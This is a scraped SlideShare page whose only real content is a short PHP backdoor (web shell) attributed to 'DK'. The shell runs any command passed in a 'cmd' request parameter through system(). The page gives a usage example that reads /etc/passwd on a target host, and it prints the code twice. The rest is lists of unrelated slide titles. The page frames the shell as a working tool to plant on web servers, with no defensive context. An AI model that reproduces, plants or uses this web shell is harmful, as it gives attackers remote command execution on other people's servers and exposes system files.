SlideShare a Scribd company logo
<!-- Simple PHP backdoor by DK (http://michaeldaw.org) -->

<?php

if(isset($_REQUEST['cmd'])){
        echo "<pre>";
        $cmd = ($_REQUEST['cmd']);
        system($cmd);
        echo "</pre>";
        die;
}

?>

Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd

<!--    http://michaeldaw.org   2006    -->

More Related Content

PDF
2018-06-06 @nuxtjs/auth with Django Rest Framework
PDF
Charla EHU Noviembre 2014 - Desarrollo Web
PDF
Asynchronous PHP and Real-time Messaging
PDF
Client-side Storage 
 
PDF
CGI.pm - 3ло?!
PDF
Asynchronous I/O in PHP
PDF
Puppet Camp 2012
PPT
Nodejs quick start
2018-06-06 @nuxtjs/auth with Django Rest Framework
Charla EHU Noviembre 2014 - Desarrollo Web
Asynchronous PHP and Real-time Messaging
Client-side Storage 
 
CGI.pm - 3ло?!
Asynchronous I/O in PHP
Puppet Camp 2012
Nodejs quick start

What's hot (20)

ODP
The promise of asynchronous PHP
PDF
ZeroMQ Is The Answer: DPC 11 Version
PDF
Scaling antispam solutions with Puppet
PDF
React PHP: the NodeJS challenger
PDF
ZeroMQ Is The Answer
PDF
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
PDF
HTTP Caching and PHP
PDF
ZeroMQ: Messaging Made Simple
TXT
Code
PDF
PDF
Xdebug - Derick Rethans - Barcelona PHP Conference 2008
KEY
GettingStartedWithPHP
ZIP
Web Apps in Perl - HTTP 101
KEY
Mojo as a_client
PPTX
Nagios
PDF
LAMP_TRAINING_SESSION_8
PPTX
Sessions and cookies in php
ODP
Beyond PHP - it's not (just) about the code
PDF
わかった気になるgitit-0.8
The promise of asynchronous PHP
ZeroMQ Is The Answer: DPC 11 Version
Scaling antispam solutions with Puppet
React PHP: the NodeJS challenger
ZeroMQ Is The Answer
StHack 2013 - Florian "@agixid" Gaultier No SQL injection but NoSQL injection
HTTP Caching and PHP
ZeroMQ: Messaging Made Simple
Code
Xdebug - Derick Rethans - Barcelona PHP Conference 2008
GettingStartedWithPHP
Web Apps in Perl - HTTP 101
Mojo as a_client
Nagios
LAMP_TRAINING_SESSION_8
Sessions and cookies in php
Beyond PHP - it's not (just) about the code
わかった気になるgitit-0.8
Ad

Viewers also liked (15)

PDF
Acerca de las pilas
PPT
Accountability Corbit Overview 06262007
PDF
ใบสมัครปริญญาโท
PDF
Props c
DOC
Motive Power Technician - Technical Offering Focuses on Hands-on Skills
TXT
Nouveau document texte
PPT
Certificados Digitais
DOCX
Competencias genéricas
PDF
Gamc festa della donna - invito
PDF
Plazast12012 sinnombres.docx (1)
PDF
Premio nacional ampliación de los plazos
PDF
Primeros Auxilios y Reanimación Cardio Pulmonar
PDF
2016 GMekong Forum - S13 - intro to NSHD-M
PPT
Edema agudo de pulmon
PDF
Acerca de las pilas
Accountability Corbit Overview 06262007
ใบสมัครปริญญาโท
Props c
Motive Power Technician - Technical Offering Focuses on Hands-on Skills
Nouveau document texte
Certificados Digitais
Competencias genéricas
Gamc festa della donna - invito
Plazast12012 sinnombres.docx (1)
Premio nacional ampliación de los plazos
Primeros Auxilios y Reanimación Cardio Pulmonar
2016 GMekong Forum - S13 - intro to NSHD-M
Edema agudo de pulmon
Ad

Recently uploaded (20)

PPTX
Cloud computing and distributed systems.
PDF
Agricultural_Statistics_at_a_Glance_2022_0.pdf
PDF
Empathic Computing: Creating Shared Understanding
PDF
Encapsulation theory and applications.pdf
PPT
“AI and Expert System Decision Support & Business Intelligence Systems”
PDF
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
PDF
Network Security Unit 5.pdf for BCA BBA.
PDF
Chapter 3 Spatial Domain Image Processing.pdf
PDF
The Rise and Fall of 3GPP – Time for a Sabbatical?
PDF
KodekX | Application Modernization Development
PDF
Approach and Philosophy of On baking technology
PPTX
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
PPTX
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
PPT
Teaching material agriculture food technology
PPTX
Understanding_Digital_Forensics_Presentation.pptx
PDF
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
PPTX
Digital-Transformation-Roadmap-for-Companies.pptx
PDF
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
PDF
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
PPTX
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy
Cloud computing and distributed systems.
Agricultural_Statistics_at_a_Glance_2022_0.pdf
Empathic Computing: Creating Shared Understanding
Encapsulation theory and applications.pdf
“AI and Expert System Decision Support & Business Intelligence Systems”
Build a system with the filesystem maintained by OSTree @ COSCUP 2025
Network Security Unit 5.pdf for BCA BBA.
Chapter 3 Spatial Domain Image Processing.pdf
The Rise and Fall of 3GPP – Time for a Sabbatical?
KodekX | Application Modernization Development
Approach and Philosophy of On baking technology
KOM of Painting work and Equipment Insulation REV00 update 25-dec.pptx
VMware vSphere Foundation How to Sell Presentation-Ver1.4-2-14-2024.pptx
Teaching material agriculture food technology
Understanding_Digital_Forensics_Presentation.pptx
Architecting across the Boundaries of two Complex Domains - Healthcare & Tech...
Digital-Transformation-Roadmap-for-Companies.pptx
Blue Purple Modern Animated Computer Science Presentation.pdf.pdf
How UI/UX Design Impacts User Retention in Mobile Apps.pdf
Detection-First SIEM: Rule Types, Dashboards, and Threat-Informed Strategy

Simple php backdoor_by_dk

  • 1. <!-- Simple PHP backdoor by DK (http://michaeldaw.org) --> <?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; } ?> Usage: http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd <!-- http://michaeldaw.org 2006 -->